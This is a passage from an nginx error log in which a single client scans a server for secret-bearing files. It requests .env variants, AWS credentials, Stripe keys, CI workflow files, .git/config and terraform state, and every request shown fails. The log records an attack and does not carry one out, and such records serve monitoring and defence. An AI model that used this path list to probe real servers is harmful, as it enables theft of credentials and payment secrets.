(2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.old HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env_sample" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env_sample HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/.env.prod" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.prod HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/crm/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /crm/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/local/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /local/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/core/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /core/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/apps/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /apps/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/application/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /application/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/web/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /web/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/wp-config.php.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.bak HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:05 [error] 343#343: *134968 open() "/var/www/html/dashboard/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /dashboard/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/admin/server_info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/server_info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/server_info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server_info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /test.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/server-info" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server-info HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/server-info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /server-info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:07 [error] 343#343: *134968 open() "/var/www/html/secured/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /secured/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:09 [error] 343#343: *134968 open() "/var/www/html/appsettings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /appsettings.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:10 [error] 343#343: *134968 open() "/var/www/html/config/aws.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:10 [error] 343#343: *134968 open() "/var/www/html/settings.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:10 [error] 343#343: *134968 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:12 [error] 343#343: *134968 open() "/var/www/html/application.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /application.properties HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:13 [error] 343#343: *134968 open() "/var/www/html/storage/logs/laravel.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/laravel.log HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:13 [error] 343#343: *134968 open() "/var/www/html/karma.conf.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /karma.conf.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:13 [error] 343#343: *134968 open() "/var/www/html/swagger.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /swagger.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:15 [error] 344#344: *152801 open() "/var/www/html/backend/config/default.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/default.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:22 [error] 344#344: *152801 open() "/var/www/html/app.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:28 [error] 344#344: *155774 open() "/var/www/html/api/objects/codes.php.save" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/objects/codes.php.save HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:32 [error] 344#344: *155774 open() "/var/www/html/backend/config/development.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/development.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:33 [error] 344#344: *155774 open() "/var/www/html/config/application.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/application.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:33 [error] 344#344: *155774 open() "/var/www/html/config/storage.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/storage.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:35 [error] 344#344: *155774 open() "/var/www/html/configs/s3_config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /configs/s3_config.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:36 [error] 344#344: *155774 open() "/var/www/html/getcpuutil.php-bakworking" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /getcpuutil.php-bakworking HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:38 [error] 344#344: *155774 open() "/var/www/html/my_env/chakaash.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/chakaash.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:38 [error] 344#344: *155774 open() "/var/www/html/my_env/newsletter.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/newsletter.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:38 [error] 344#344: *155774 open() "/var/www/html/my_env/palash.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /my_env/palash.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/config/settings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/config/settings.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.local HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/.circleci/configs/development.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/configs/development.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/config/settings.prod" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings.prod HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/app/config/parameters.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:40 [error] 344#344: *155774 open() "/var/www/html/config/parameters.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/.AWS_/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.AWS_/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/config/local.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/local.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/backend/config/settings.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/config/settings.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/api/config/config.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/config/config.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/admin/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/config HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/.travis.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.travis.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/aws.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/sms.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /sms.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/config/config.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/config.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:41 [error] 344#344: *155774 open() "/var/www/html/main.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /main.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:44 [error] 344#344: *155774 open() "/var/www/html/debug/default/view" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /debug/default/view HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:44 [error] 342#342: *188467 open() "/var/www/html/aws/credentials" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:44 [error] 342#342: *188467 open() "/var/www/html/.aws/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.aws/config HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:44 [error] 342#342: *188467 open() "/var/www/html/config/stripe.ts" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.ts HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:47 [error] 342#342: *192926 open() "/var/www/html/api/stripe.ts" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/stripe.ts HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/config/services.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/services.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/config/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/app/Services/StripeService.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/Services/StripeService.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/app/Http/Controllers/StripeController.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/Http/Controllers/StripeController.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/bootstrap/cache/config.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /bootstrap/cache/config.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/storage/app/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/app/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/storage/app/keys/stripe.key" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/app/keys/stripe.key HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/app/config/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/app/config/payment.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/config/payment.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/config/settings/stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/settings/stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/settings_stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings_stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:52 [error] 345#345: *204815 open() "/var/www/html/app/settings_stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/settings_stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/project/settings/payment.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /project/settings/payment.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/core/payment.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /core/payment.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/secrets/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /secrets/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/instance/config.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /instance/config.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/initializers/stripe.rb" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/initializers/stripe.rb HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/secrets.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/secrets.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/credentials.yml.enc" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/credentials.yml.enc HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/payment.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/payment.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/stripe.yaml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/internal/stripe/keys.go" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /internal/stripe/keys.go HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.github/workflows/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.github/workflows/deploy.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/deploy.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.github/workflows/build.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/build.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.github/stripe.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/stripe.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.gitlab-ci.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.gitlab-ci.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.circleci/config.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.circleci/config.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/.bitbucket/pipelines.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.bitbucket/pipelines.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:53 [error] 345#345: *204815 open() "/var/www/html/config/webhook.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/webhook.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/webhook/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /webhook/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/webhooks/settings.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /webhooks/settings.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/composer.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /composer.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/package.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /package.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/requirements.txt" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /requirements.txt HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/Gemfile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Gemfile HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/pom.xml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /pom.xml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/.dockerignore" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.dockerignore HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/Dockerfile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Dockerfile HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 "/var/www/html/.github/workflows/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 "/var/www/html/terraform/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /terraform/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 "/var/www/html/.terraform/index.html" is not found (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.terraform/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/docker-compose.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:55 [error] 342#342: *207788 open() "/var/www/html/Makefile" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /Makefile HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/tox.ini" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /tox.ini HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/setup.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /setup.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/gradle.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /gradle.properties HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/build.gradle" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /build.gradle HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/settings.gradle" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings.gradle HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/SonarQube.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /SonarQube.properties HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/sonar-project.properties" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /sonar-project.properties HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/config/stripe.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/stripe.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/config/services/stripe.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/services/stripe.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/settings/stripe.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /settings/stripe.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/config/credentials.yml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config/credentials.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/logs/stripe.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/stripe.log HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/storage/logs/payments.log" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /storage/logs/payments.log HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/backup/stripe.json" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backup/stripe.json HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/stripe.backup" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.backup HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/stripe.old" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.old HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/stripe.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /stripe.bak HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.env.stripe" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.stripe HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/terraform/stripe.tf" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /terraform/stripe.tf HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:56 [error] 342#342: *207788 open() "/var/www/html/.terraform/stripe.tfstate" failed (2: No such file or directory), client: 